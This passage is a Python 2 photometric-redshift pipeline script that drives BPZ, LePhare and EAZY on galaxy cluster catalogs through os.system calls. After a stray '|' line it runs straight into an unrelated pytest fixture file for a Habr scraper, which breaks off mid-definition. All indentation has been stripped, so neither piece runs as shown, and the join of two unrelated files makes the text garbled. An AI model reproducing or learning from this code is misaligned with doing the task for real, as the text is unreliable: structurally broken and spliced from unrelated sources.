#print shifts, res
print columns
raw = open(columns,'r').readlines()
i = -1
filen = columns.replace('.replace','')
out = open(filen,'w')
for line in raw:
if string.find(line,'AB')!=-1:
i += 1
if i < len(res):
''' sign on shifts is opposite !!! '''
#line = line.replace('REPLACE',str(-1.*float(res[i])))
line = line.replace('REPLACE',str(0))
line = line.replace('\n','')
if len(line) > 0:
out.write(line + '\n')
out.close()
return res_fix
#shifts_v = res = ['0.66','0','0','-0.095','0.228','0.23','0','0','0.36','-0.15','0.002','0.244373']
def apply_shifts(file, filters, columns ):
shifts_v = res = ['0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0'][0:len(filters)]
import string
#print shifts, res
print columns
raw = open(columns,'r').readlines()
i = -1
filen = columns.replace('.replace','')
out = open(filen,'w')
for line in raw:
if string.find(line,'AB')!=-1:
i += 1
if i < len(res):
line = line.replace('REPLACE',res[i])
line = line.replace('\n','')
if len(line) > 0:
out.write(line + '\n')
out.close()
return shifts_v
def parseeazy(catalog,n):
from utilities import run
import os
f = open(catalog,'r').readlines()
sntmp = open('sntmp','w')
key_start = False
keys = []
for line in f:
import string
if line[0:2] == '# ':
import re
res2 = re.split('\s+',line[:-1])
print res2
for k in res2[1:]:
keys.append('EAZY_' + k)
break
if line[0] != '#':
break
print keys
tempconf = '/tmp/' + os.environ['USER'] + 'photoz.conf'
conflist = open(tempconf,'w')
for key in keys:
if key == 'EAZY_id' :
conflist.write('COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
else:
conflist.write('COL_NAME = ' + key + '\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
conflist.close()
import os
tempcat = '/tmp/' + os.environ['USER'] + 'zs.cat'
run('asctoldac -i ' + catalog + ' -o ' + catalog + '.temp.tab' + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
command = 'ldacaddkey -i ' + catalog + '.temp.tab -o ' + catalog + '.tab -t STDTAB -k EAZY_NUMBER ' + str(n) + ' FLOAT "" '
print command
os.system(command)
print catalog + '.tab'
def parsebpz(catalog,n):
import os
from utilities import run
f = open(catalog,'r').readlines()
sntmp = open(os.environ['USER'] + 'sntmp','w')
key_start = False
keys = []
for line in f:
import string
if line[0:2] == '# ':
import re
res2 = re.split('\s+',line[:-1])
print res2
keys.append('BPZ_' + res2[2])
if line[0] != '#':
break
tempconf = '/tmp/' + os.environ['USER'] + 'photoz.conf'
conflist = open(tempconf,'w')
for key in keys:
if key == 'BPZ_ID' :
conflist.write('COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
else:
conflist.write('COL_NAME = ' + key + '\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
conflist.close()
import os
tempcat = '/tmp/' + os.environ['USER'] + 'zs.cat'
run('asctoldac -i ' + catalog + ' -o ' + catalog + '.temp.tab' + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
command = 'ldacaddkey -i ' + catalog + '.temp.tab -o ' + catalog + '.tab -t STDTAB -k BPZ_NUMBER ' + str(n) + ' FLOAT "" '
print command
os.system(command)
print catalog + '.tab'
print 'here'
def parselph(catalog):
from utilities import run
f = open(catalog,'r').readlines()
sntmp = open(os.environ['USER'] + 'sntmp','w')
key_start = False
keys = []
for line in f:
import string
if key_start:
import re
res = re.split(',',line[1:])
for r in res:
res2 = re.split('\s+',r)
if len(res2) > 2:
keys.append('LPH_' + res2[1])
if string.find(line,'Output format') != -1:
key_start = True
if string.find(line,'########') != -1 and key_start == True:
key_start = False
break
tempconf = '/tmp/' + os.environ['USER'] + 'photoz.conf'
conflist = open(tempconf,'w')
for key in keys:
if key == 'ID' :
conflist.write('COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
else:
conflist.write('COL_NAME = ' + key + '\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
conflist.close()
import os
tempcat = '/tmp/' + os.environ['USER'] + 'zs.cat'
run('asctoldac -i ' + catalog + ' -o ' + catalog + '.tab' + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
print catalog + '.tab'
#input = reduce(lambda x,y: x + ' ' + y, keys)
#run('ldacjoinkey -t OBJECTS -i /tmp/' + cluster + 'output.cat -p ' + tempcat + ' -o /tmp/' + cluster + 'final.cat -t STDTAB -k ' + input)
def get_filters(cat,tab='STDTAB',SPECTRA=None):
import astropy, astropy.io.fits as pyfits, string
dict = {}
p = pyfits.open(cat)
#print p[tab].columns
for column in p[tab].columns:
import re
res = re.split('-',column.name)
#if len(res) > 1 and (string.find(column.name,'SUBARU') != -1 or string.find(column.name,'MEGA')!=-1 or string.find(column.name,'WIR')!=-1) and string.find(column.name,'1-u') == -1 and string.find(column.name,'SUBARU-9') == -1:
''' 1423 u-band image is bad '''
use = False
if len(res) > 1 and string.find(column.name,'W-J-U') == -1 and string.find(column.name,'FWHM')==-1 and string.find(column.name,'COADD')==-1 and string.find(column.name,'MAG')!=-1 and string.find(column.name,'--')==-1:
if SPECTRA == 'CWWSB_capak_ubvriz.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['-u','W-J-B','W-J-V','W-C-RC','W-C-IC','W-S-Z+']]))
elif SPECTRA == 'CWWSB_capak_u.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['W-J-B','W-J-V','W-C-RC','W-C-IC','W-S-Z+']]))
elif SPECTRA == 'CWWSB_capak_ub.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['W-J-V','W-C-RC','W-S-I+','W-C-IC','W-S-Z+']]))
elif SPECTRA == 'CWWSB_capak_uz.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['W-J-B','W-J-V','W-C-RC','W-C-IC']]))
else:
use = True
if string.find(column.name,'SUBARU') != -1 and (string.find(column.name,'10') == -1 and string.find(column.name,'9') == -1) and string.find(column.name,'8')==-1:
use = False
if string.find(column.name,'MEGAPRIME') != -1 and (string.find(column.name,'1') == -1 and string.find(column.name,'0') == -1):
use = False
if string.find(cat,'A370') != -1 and (string.find(column.name,'W-S-I+') != -1 or string.find(column.name,'8') != -1):
use = False
if string.find(cat, 'HDFN') != -1 and (string.find(column.name,'SUBARU-9') != -1 or string.find(column.name,'W-S-I+')!= -1 or string.find(column.name,'-2-') != -1): # or string.find(column.name,'u') != -1):
use = False
#if string.find(cat,'HDFN') != -1 and (string.find(column.name,'W-S-Z+') != -1):
# use = False
if string.find(cat,'A383') != -1 and (string.find(column.name,'u') != -1): # or string.find(column.name,'W-J-V') != -1):
use = False
#string.find(column.name,'SUBARU-9') != -1 or
''' remove WHT data, and u-band data '''
if string.find(column.name,'WH') != -1 or string.find(column.name,'u') != -1 or string.find(column.name,'-U') != -1: # or string.find(column.name,'B') != -1: # or (string.find(column.name,'B') != -1 and string.find(column.name,'9') != -1): # is False:
use = False
#if string.find(column.name,'W-S-I+') != -1: # or string.find(column.name,'B') != -1: # or (string.find(column.name,'B') != -1 and string.find(column.name,'9') != -1): # is False:
# use = False
if False: #string.find(cat,'HDFN') != -1 and (string.find(column.name,'W-J-B') != -1 and string.find(column.name,'9') != -1):
use = False
#if string.find(cat,'HDFN') != -1 and string.find(column.name,'W-S-Z') != -1:
# use = False
''' throw out early data '''
#if string.find(column.name,'SUBARU') != -1 and (string.find(column.name,'9') != -1 or string.find(column.name,'8')!=-1):
# use = False
# and string.find(column.name,'1-u') == -1: # and string.find(column.name,'W-J-B') == -1 : #or string.find(column.name,'MEGA')!=-1 or string.find(column.name,'WIR')!=-1): # and string.find(column.name,'1-u') == -1: # and string.find(column.name,'SUBARU-9') == -1: # and string.find(column.name,'10_1') == -1: #
# and string.find(column.name,'1-u') == -1
if use:
try:
dummy = int(res[-1])
except:
filt = reduce(lambda x,y: x+'-'+y,res[1:])
dict[filt] = 'yes'
if False: #string.find(filt,'WHT') != -1:
print column.name, res, filt
#print res, filter, column
filters = dict.keys()
print 'filters=',filters
return filters
def figure_out_slr_chip(filters,catalog,tab='STDTAB',magtype='APER1'):
#magtype='APER1'
print magtype, 'magtype'
import astropy, astropy.io.fits as pyfits, string
print catalog
table = pyfits.open(catalog)[tab].data
stdfilts = {}
good_star_nums = {}
for filt in filters:
a = table.field('MAG_' + magtype + '-' + filt)
b = a[a!=-99]
print filt, len(a), len(b)
import utilities
stdfilt = utilities.parseFilter(filt)[-1]
''' USE LATE 10_1 or 10_2 data if possible '''
if string.find(filt,'-2-') == -1 and (string.find(filt,'10_2') != -1 or string.find(filt,'10_1') != -1):
stat = 9999999999
else:
stat = len(b)
if not stdfilt in stdfilts:
stdfilts[stdfilt] = [[stat, filt]]
else:
stdfilts[stdfilt] += [[stat, filt]]
good_star_nums[filt] = len(b)
print stdfilts
moststarfilts = {}
for key in stdfilts:
usefilt = sorted(stdfilts[key],reverse=True)[0][1]
moststarfilts[key] = usefilt
print moststarfilts
return moststarfilts, good_star_nums
def do_it(CLUSTER,DETECT_FILTER,AP_TYPE,filters,inputcat, calib_type,spec,use_spec,SPECTRA,picks=None,magtype='ISO',randsample=False,short=False,randpercent=0.03,magflux='FLUX',ID='SeqNr',only_type=False):
import os
go = True
LEPHAREDIR='/nfs/slac/g/ki/ki04/pkelly/lephare_dev/'
LEPHAREWORK='/nfs/slac/g/ki/ki04/pkelly/lepharework/'
#adam-old# SUBARUDIR='/nfs/slac/g/ki/ki05/anja/SUBARU'
SUBARUDIR=os.environ['SUBARUDIR']
iaper = '1'
dict = {'LEPHAREDIR':LEPHAREDIR,
'SUBARUDIR':SUBARUDIR,
'PHOTOMETRYDIR': 'PHOTOMETRY_' + DETECT_FILTER + AP_TYPE,
'AP_TYPE': AP_TYPE,
'CLUSTER':CLUSTER,
'BPZPATH':os.environ['BPZPATH'],
'iaper':iaper,
'calib_type':calib_type,
'magtype':magtype,
}
if len(filters) > 4: dict['INTERP'] = '8'
else: dict['INTERP'] = '0'
final_cats = []
dict['SPECTRA'] = SPECTRA #'CWWSB_capak.list' # use Peter Capak's SEDs
#dict['SPECTRA'] = 'CWWSB4.list'
#dict['SPECTRA'] = 'CFHTLS_MOD.list'
for type in ['bpz']:
dict['type'] = type
dict['incat_lph'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.lph%(iaper)s.tab' % dict
dict['incat_bpz'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.bpz%(iaper)s.tab' % dict
#print dict['incat_bpz']
#print ID
dict['incat_eazy'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.eazy%(iaper)s' % dict
dict['header_eazy'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.eazyheader' % dict
dict['incat_prior'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.prior%(iaper)s.tab' % dict
#filters = get_filters(dict['incat_' + dict['type']])
''' make configuration file '''
dummy_config = '%(LEPHAREDIR)s/config/dummy_config.para' % dict
t = open(dummy_config).read()
config = '%(LEPHAREDIR)s/config/%(CLUSTER)sconfig.para' % dict
dict.update({'config':config})
import string
fstring = ''
quadadd = ''
i = 1
goodl = []
for z in filters:
#if string.find(z,'MEGA')!=-1:
# f = 'cfht/megacam/' + z + '.pb'
#elif string.find(z,'SUBARU')!=-1:
print z
if True: #(string.find(z,'10_2-1') != -1 or string.find(z,'10_1-1') != -1) and string.find(z,'SUBARU')!=-1:
goodl.append(i)
i += 1
print goodl
if True:
f = '' + z + '.res'
from glob import glob
print glob(os.environ['BPZPATH'] + '/FILTER/' + f)
print os.environ['BPZPATH'] + '/FILTER/' + f
if len(glob(os.environ['BPZPATH'] + '/FILTER/' + f)) > 0:
fstring += f + ','
quadadd += '0.00,'
else:
print 'couldnt find filter!!!'
raise Exception
if len(goodl) > 1:
ref = str(goodl[0]) + ',' + str(goodl[1]) + ',' + str(goodl[0])
else: ref = '1,3,1'
dict['ref'] = ref
import re
constantFilter = reduce(lambda x,y: str(x) + ',' + str(y), [filters[i] for i in [int(z) for z in re.split('\,',ref)]])
print constantFilter
dict['mag_ref'] = str(goodl[0])
fstring = fstring[:-1]
quadadd = quadadd[:-1]
print fstring
dict['quadadd'] = str(quadadd)
print quadadd
dict['fstring'] = fstring
if False:
c = open(config,'w')
c.write('FILTER_LIST ' + fstring + '\n' + t.replace('cluster',dict['CLUSTER']))
#c.write('FILTER_LIST ' + fstring + '\n' + t.replace('cluster',dict['CLUSTER']))
c.close()
print config
if False: # go:
os.system(os.environ['LEPHAREDIR'] + '/source/filter -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/sedtolib -t G -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/sedtolib -t S -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/mag_star -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/mag_gal -t G -c ' + config)
go = False
''' retrieve zeropoint shifts '''
columns = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.columns.replace' % dict
file = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.spec.zs' % dict
print spec
if spec:
''' filter out cluster galaxies '''
spec_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)sspec.cat' % dict
Z = get_cluster_z(spec_cat)
print Z
training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.lph%(iaper)s' % dict
#new_training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.training' % dict
#ntc = open(new_training_cat,'w')
#print training_cat
#for l in open(training_cat).readlines():
# import re
# res = re.split('\s+',l)
# print float(res[-3])
# if not (Z - 0.015 < float(res[-3]) < Z + 0.015):
# ntc.write(l)
#ntc.close()
#os.system('cp ' + training_cat + ' ' + new_training_cat )
''' make zphot.param file '''
if False:
eazydir = '/nfs/slac/g/ki/ki04/pkelly/eazy-1.00/'
dummy = open(eazydir + 'zphot.dummy','r').read()
training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/specsave.cat.eazy%(iaper)s' % dict
ecat = open(training_cat,'r').read()
eheader = open(dict['header_eazy'],'r').read()
print training_cat, eheader
scat = open('/tmp/pat','w')
scat.write(eheader + ecat)
scat.close()
filter_res = 'test.RES' % dict
dummy = "".join([dummy,'FILTERS_RES ' + filter_res + '\n'])
dummy = "".join([dummy,'CATALOG_FILE /tmp/pat \n'])
dummy = "".join([dummy,'PRIOR_FILTER ' + str(1) + '\n'])
zphot = open('zphot.param','w')
zphot.write(dummy)
zphot.close()
command = eazydir + 'src/eazy'
print command
os.system(command)
parseeazy('./OUTPUT/photz.zout','0')
''' first retrieve LEPHARE zeropoint corrections '''
command = '%(LEPHAREDIR)s/source/zphota -c %(config)s \
-CAT_TYPE LONG \
-ADAPT_BAND %(ref)s \
-MAG_REF %(mag_ref)s \
-MABS_REF %(mag_ref)s \
-ADAPT_LIM 18,22 \
-ZMAX_GAL 1 \
-SPEC_OUT YES \
-CAT_IN %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.training\
-CAT_OUT %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.spec.zs \
-FILTER_LIST %(fstring)s\
-ERR_SCALE %(quadadd)s' % dict
print command
#os.system(command)
print command
outputcat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.spec.zs' % dict
print outputcat
#parselph(outputcat)
print outputcat
#rejects = mkplot(outputcat,'0')
#print rejects
for i in []: #'1']: #: #'2']: #,'3','4']:
new_training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.training' % dict
reject_training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.reject' % dict
ntc = open(reject_training_cat,'w')
print training_cat
for l in open(new_training_cat).readlines():
import re
res = re.split('\s+',l)
bad = False
for p in rejects:
if int(p) == int(res[0]): bad = True
if not bad:
ntc.write(l)
ntc.close()
print reject_training_cat
command = '%(LEPHAREDIR)s/source/zphota -c %(config)s \
-CAT_TYPE LONG \
-ADAPT_BAND %(ref)s \
-MAG_REF %(mag_ref)s \
-MABS_REF %(mag_ref)s \
-ADAPT_LIM 18,22 \
-SPEC_OUT YES \
-ZMAX_GAL 1 \
-CAT_IN %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.reject\
-CAT_OUT %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.spec.zs \
-FILTER_LIST %(fstring)s\
-ERR_SCALE %(quadadd)s' % dict
''' first retrieve LEPHARE zeropoint corrections '''
print command
os.system(command)
rejects += mkplot(outputcat,str(i))
#print new_training_cat
#print reject_training_cat
print file
#shifts = parse(file,filters,constantFilter,columns,dict['CLUSTER'])
catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(SPECTRA)s.%(iaper)s.spec.bpz' % dict
print catalog
dict['catalog'] = catalog
dict['n'] = '1'
dict['probs'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(SPECTRA)s.%(iaper)s.spec.probs ' % dict
dict['flux'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(SPECTRA)s.%(iaper)s.spec.flux_comparison ' % dict
dict['input'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.%(magtype)s.%(AP_TYPE)s.%(SPECTRA)s.cat.bpz1' % dict
dict['columns'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.%(magtype)s.%(AP_TYPE)s.%(SPECTRA)s.cat.columns' % dict
#dict['SPECTRA'] = SPECTRA
#dict['SPECTRA'] = 'CWWSB4.list'
if True:
if magflux == 'FLUX': dict['magvar'] = 'no'
else: dict['magvar'] = 'yes'
command = 'python %(BPZPATH)s/bpz.py %(input)s \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-ONLY_TYPE NO \
-ZMAX 4.0 \
-INTERP %(INTERP)s \
-PROBS_LITE %(probs)s \
-OUTPUT %(catalog)s' % dict
print command
os.system(command)
print catalog
print catalog
parsebpz(catalog,'0')
''' NEED TO MAKE CATALOG IN TABLE FORM!!!! '''
print 'finished'
else:
#shifts = apply_shifts(file,filters,columns)
print file
print columns
print 'zero shifts'
#dict.update({'SHIFTS':reduce(lambda x,y:x+','+y,shifts)})
if short or randsample:
nsplit = 1
elif not picks:
nsplit = 4
else: nsplit = 1
print nsplit, randsample, picks
print dict['incat_' + dict['type']].replace('.tab','')
            # import ipdb; ipdb.set_trace()  # debug breakpoint disabled so the pipeline can run non-interactively
import random
l = open(dict['incat_' + dict['type']].replace('.tab',''),'r').readlines()
if True:
subset = 0 #random.sample(range(len(l)-100),1)[0]
flist = []
#nsplit = 1
interval = int(len(l)/nsplit)
for n in range(nsplit):
dict.update({'n':n})
print 'n, writing'
start = 1 + subset + n*interval
end = 1 + subset + (n+1)*interval
if n == range(nsplit)[-1]:
end = len(l) + 2
#if n == range(nsplit)[-1]:
# end = 1 + len(l)
print start, end
print randsample
os.system('rm ' + dict['incat_' + dict['type']] + str(n))
if False: #randsample:
command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '(" + ID + " > 0);' -o " + dict['incat_' + dict['type']] + str(n)
elif not picks:
command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '((" + ID + " >= " + str(start) + ") AND (" + ID + " < " + str(end) + "));' -o " + dict['incat_' + dict['type']] + str(n)
else:
command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '((" + ID + " >= " + str(picks[0]) + ") AND (" + ID + " < " + str(picks[0]+1) + "));' -o " + dict['incat_' + dict['type']] + str(n)
#command = 'ldacfilter -i ' + dict['incat_' + dict['type']] + " -t STDTAB -c '((SeqNr >= 0) AND (SeqNr < 1000000));' -o " + dict['incat_' + dict['type']] + str(n)
print command
os.system(command)
if not glob(dict['incat_' + dict['type']] + str(n)):
raise Exception
catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat' % dict
command = 'ldactoasc -b -i ' + dict['incat_' + dict['type']] + str(n) + ' -t STDTAB > ' + catalog
print command
os.system(command)
dir = '/tmp/' + os.environ['USER'] + '/'
os.system('mkdir -p ' + dir)
os.chdir(dir)
print dict
print randsample
if True:
children = []
catalogs = []
probs = []
fluxes = []
for n in range(nsplit):
if nsplit > 1:
child = os.fork()
else: child = False
dict.update({'n':n})
catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.bpz' % dict
prob = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.probs' % dict
flux = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_%(type)s%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.flux_comparison ' % dict
if nsplit == 1:
children.append(child)
catalogs.append(catalog+'.tab')
probs.append(prob)
fluxes.append(flux)
if child:
children.append(child)
catalogs.append(catalog+'.tab')
probs.append(prob)
fluxes.append(flux)
else:
dict['catalog'] = catalog
dict['prob'] = prob
dict['columns'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.%(magtype)s.%(AP_TYPE)s.%(SPECTRA)s.cat.columns' % dict
if False:
eazydir = '/nfs/slac/g/ki/ki04/pkelly/eazy-1.00/'
dummy = open(eazydir + 'zphot.dummy','r').read()
#training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/specsave.cat.eazy%(iaper)s' % dict
training_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.eazy1' % dict
ecat = open(training_cat,'r').read()
eheader = open(dict['header_eazy'],'r').read()
print training_cat, eheader
scat = open('/tmp/pat','w')
scat.write(eheader + ecat)
scat.close()
os.system('mkdir -p /tmp/pkelly/OUTPUT/')
filter_res = 'test.RES' % dict
dummy = "".join([dummy,'FILTERS_RES ' + filter_res + '\n'])
dummy = "".join([dummy,'CATALOG_FILE /tmp/pat \n'])
dummy = "".join([dummy,'PRIOR_FILTER ' + str(1) + '\n'])
zphot = open('zphot.param','w')
zphot.write(dummy)
zphot.close()
command = eazydir + 'src/eazy'
print command
os.system(command)
os.system('pwd')
parseeazy('./OUTPUT/photz.zout','0')
if dict['type'] == 'lph':
command = '%(LEPHAREDIR)s/source/zphota -c %(config)s \
-CAT_TYPE LONG \
-AUTO_ADAPT NO \
-Z_STEP 0.02,2.5,0.1 \
-ZMAX_GAL 2.5 \
-APPLY_SHIFTS %(SHIFTS)s \
-CAT_IN %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.cat.lph%(iaper)s.%(n)s \
-CAT_OUT %(catalog)s' % dict
print command
os.system(command)
parselph(catalog)
if magflux == 'FLUX': dict['magvar'] = 'no'
else: dict['magvar'] = 'yes'
if dict['type'] == 'bpz':
#-NEW_AB yes \
#''' FIX PRIOR AND INTERPOLATION!!! '''
command = 'python %(BPZPATH)s/bpz.py %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_bpz%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-VERBOSE no \
-ZMAX 4.0 \
-PLOTS yes \
-INTERP %(INTERP)s \
-PROBS_LITE %(prob)s \
-OUTPUT %(catalog)s' % dict
if only_type:
command= 'python %(BPZPATH)s/bpz.py %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_bpz%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-VERBOSE no \
-ZMAX 4.0 \
-PLOTS yes \
-INTERP 8 \
-PROBS_LITE %(prob)s \
-ONLY_TYPE yes \
-OUTPUT %(catalog)s' % dict
print command
#fit_zps(dict)
#raw_input('finished') #print catalog
os.system(command)
parsebpz(catalog,str(n))
import sys
if nsplit > 1: sys.exit(0)
if nsplit > 1:
for child in children:
os.waitpid(child,0)
if randsample:
base = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.%(SPECTRA)s.rand' % dict
output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.rand.%(SPECTRA)s.%(calib_type)s.tab' % dict
elif picks is None:
base = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.%(SPECTRA)s.all' % dict
output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.photoz.%(SPECTRA)s.%(calib_type)s.tab' % dict
else:
base = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.%(SPECTRA)s.picks' % dict
output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(magtype)s.%(iaper)s.picks.%(SPECTRA)s.%(calib_type)s.tab' % dict
#columns = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.columns' % dict
#os.system('cp ' + columns + ' ' + base + '.columns')
''' join the tables '''
temp = base + '.bpz.temp.tab'
command = 'ldacpaste -i ' + reduce(lambda x,y: x + ' ' + y, catalogs) + ' -o ' + temp + ' -t STDTAB'
print command
print catalogs, base
os.system(command)
final_cats.append(catalog + '.tab')
output = base + '.bpz.tab'
print temp, dict['incat_' + dict['type']]
join_cats([temp,dict['incat_' + dict['type']]],output)
print output
#priorcat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.photoz.%(SPECTRA)s.%(calib_type)s.tab' % dict
#join_cats([base+'.bpz.tab',dict['incat_prior']],output_catalog)
if True:
''' join the catalogs '''
command = 'cat ' + reduce(lambda x,y: x + ' ' + y, [z.replace('.tab','') for z in catalogs]) + ' > ' + base + '.bpz'
print command
os.system(command)
final_cats.append(catalog)
command = 'cat ' + reduce(lambda x,y: x + ' ' + y, probs) + ' > ' + base + '.probs'
print command
os.system(command)
final_cats.append(catalog)
command = 'cat ' + reduce(lambda x,y: x + ' ' + y, fluxes) + ' > ' + base + '.flux_comparison'
print command
os.system(command)
final_cats.append(catalog)
convert_to_mags(base,dict['incat_' + dict['type']],base+'.EVERY.cat')
print final_cats
#output_catalog = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.photoz.%(SPECTRA)s.%(calib_type)s.tab' % dict
#join_cats(final_cats,output_catalog)
if __name__ == '__main__':
import sys, os
maindir = sys.argv[1]
CLUSTER = sys.argv[2]
PHOTOMETRYDIR = sys.argv[3]
LEPHARE_CONFIGFILE = sys.argv[4]
naper = sys.argv[5]
makelibs = sys.argv[6]
do_it(maindir, CLUSTER, PHOTOMETRYDIR, LEPHARE_CONFIGFILE, naper, makelibs)
|
import shutil
from pathlib import Path
from typing import Generator
import pytest
from hub_scraper.models import DataFolder, Hub
from hub_scraper.scraper import HabrScraper
BASEDIR = Path(__file__).resolve().parent
@pytest.fixture()
def default_hub() -> Hub:
return Hub(
hub_name="python",
threads_number=1,
time_delay=2,
max_page=50,
min_up_votes=None,
)
@pytest.fixture()
def default_data_folder() -> Generator[DataFolder, None, None]:
yield DataFolder(data_folder="test_outputs")
shutil.rmtree("test_outputs")
@pytest.fixture()
